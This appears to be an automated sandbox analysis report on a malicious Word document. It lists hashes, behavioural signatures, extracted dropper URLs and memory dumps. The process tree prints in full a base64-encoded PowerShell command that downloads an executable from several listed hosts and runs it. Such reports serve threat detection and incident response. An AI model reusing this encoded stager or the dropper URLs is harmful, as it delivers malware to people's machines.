Analysis

  • max time kernel
    134s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-05-2024 18:40

General

  • Target

    818062b9c5654db97a9e62e596a067b8_JaffaCakes118.doc

  • Size

    234KB

  • MD5

    818062b9c5654db97a9e62e596a067b8

  • SHA1

    b85ad08de0e8806b8fca98b8d3928baf7f982a5c

  • SHA256

    fc5b2808613e062e69dcb759c97b62ae00da1088e2d530a3d0f36aa0c79e2141

  • SHA512

    21aafba1faa1fbcc8dac96191cc3c066f7441e494566a2208e817138ce47c864cc76656fda6e11c237284b1b073196f2e98f721f53b6b4c6a342779b266792c4

  • SSDEEP

    3072:gEd93LpGo0aQLomHvsHCNERonfnCuNEQIk4/91v97:gEd2V0NCNEqf2QIfJ7

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://dataland-network.com/0yhPaoFo

exe.dropper

http://128.199.68.28/NUipKSNdX

exe.dropper

http://mbostagezoeken.nl/lTxOW3ais

exe.dropper

http://199.43.199.16/wp-admin/PMnENN7UR

exe.dropper

http://206.189.45.178/wp-content/uploads/aWk9ELnU

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\818062b9c5654db97a9e62e596a067b8_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2472
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
    powersheLl -e JABJADkANgA0ADAAXwBfAD0AKAAnAFEAJwArACcAOQAxAF8AJwArACcAXwA1ACcAKQA7ACQAYgBfADAAXwA3ADAAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAUAA3ADYANgAxAF8AXwA9ACgAJwBoAHQAdABwADoALwAvAGQAYQAnACsAJwB0AGEAJwArACcAbABhAG4AJwArACcAZAAnACsAJwAtACcAKwAnAG4AZQB0AHcAbwByAGsALgBjAG8AbQAvACcAKwAnADAAJwArACcAeQAnACsAJwBoAFAAYQBvAEYAbwBAACcAKwAnAGgAdAB0AHAAJwArACcAOgAvAC8AMQAnACsAJwAyADgALgAxACcAKwAnADkAOQAuACcAKwAnADYAOAAuADIAJwArACcAOAAvAE4AJwArACcAVQBpACcAKwAnAHAAJwArACcASwBTAE4AJwArACcAZAAnACsAJwBYAEAAaAB0AHQAcAA6AC8AJwArACcALwAnACsAJwBtACcAKwAnAGIAbwAnACsAJwBzAHQAJwArACcAYQBnAGUAJwArACcAegBvACcAKwAnAGUAawBlAG4AJwArACcALgBuAGwAJwArACcALwBsAFQAeABPACcAKwAnAFcAJwArACcAMwBhAGkAcwBAAGgAdAB0AHAAOgAvACcAKwAnAC8AJwArACcAMQA5ADkALgAnACsAJwA0ADMAJwArACcALgAxADkAJwArACcAOQAuADEANgAvAHcAcAAnACsAJwAtAGEAZABtAGkAbgAvACcAKwAnAFAAJwArACcATQBuAEUATgBOADcAVQBSACcAKwAnAEAAaAB0AHQAJwArACcAcAA6AC8ALwAyADAAJwArACcANgAuACcAKwAnADEAOAA5AC4ANAA1AC4AMQA3ADgALwB3AHAAJwArACcALQAnACsAJwBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAnAGUAJwArACcAbgB0ACcAKwAnAC8AdQBwAGwAJwArACcAbwBhAGQAcwAnACsAJwAvAGEAVwBrADkARQBMAG4AJwArACcAVQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABkAF8AOAA1ADQAMwBfAD0AKAAnAHUAXwAnACsAJwAxACcAKwAnADEAMwA0ADMAJwApADsAJABGADgAMAA0ADMAMQAxADEAIAA9ACAAKAAnADcAJwArACcAOAA4ACcAKQA7ACQAWQBfADEAXwBfADEAMAA2AD0AKAAnAG8AXwAnACsAJwBfADEAOQA3ACcAKQA7ACQAdQBfAF8AOQBfADIAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARgA4ADAANAAzADEAMQAxACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAZgAxADMAMQAzADUAOQAzACAAaQBuACAAJABQADcANgA2ADEAXwBfACkAewB0AHIAeQB7ACQAYgBfADAAXwA3ADAALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAZgAxADMAMQAzADUAOQAzACwAIAAkAHUAXwBfADkAXwAyAF8AKQA7ACQARQBfADcAOAA5ADQAXwAyAD0AKAAnAEkANQAnACsAJwBfAF8AOAA5ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAHUAXwBfADkAXwAyAF8AKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJAB1AF8AXwA5AF8AMgBfADsAJABiAF8AOQA0ADkAXwA3ADkAPQAoACcAdwBfADYAJwArACcAMAAxADQAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AXwAyAF8AXwBfAF8APQAoACcARAAzAF8ANAA0ACcAKwAnADYAJwApADsA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3272

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDE349.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvqcxyet.d0b.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2472-9-0x00007FFAD83C0000-0x00007FFAD83D0000-memory.dmp
    Filesize

    64KB

  • memory/2472-547-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-1-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-21-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-6-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-7-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-8-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-2-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-10-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-11-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-14-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-13-0x00007FFAD83C0000-0x00007FFAD83D0000-memory.dmp
    Filesize

    64KB

  • memory/2472-12-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-15-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-17-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-19-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-18-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-22-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-0-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-5-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-34-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-16-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-36-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-550-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-20-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-4-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-59-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-60-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-61-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/2472-548-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-3-0x00007FFB1AC2D000-0x00007FFB1AC2E000-memory.dmp
    Filesize

    4KB

  • memory/2472-549-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/2472-546-0x00007FFADAC10000-0x00007FFADAC20000-memory.dmp
    Filesize

    64KB

  • memory/3272-530-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/3272-62-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB

  • memory/3272-47-0x000001E3BB530000-0x000001E3BB552000-memory.dmp
    Filesize

    136KB

  • memory/3272-37-0x00007FFB1AB90000-0x00007FFB1AD85000-memory.dmp
    Filesize

    2.0MB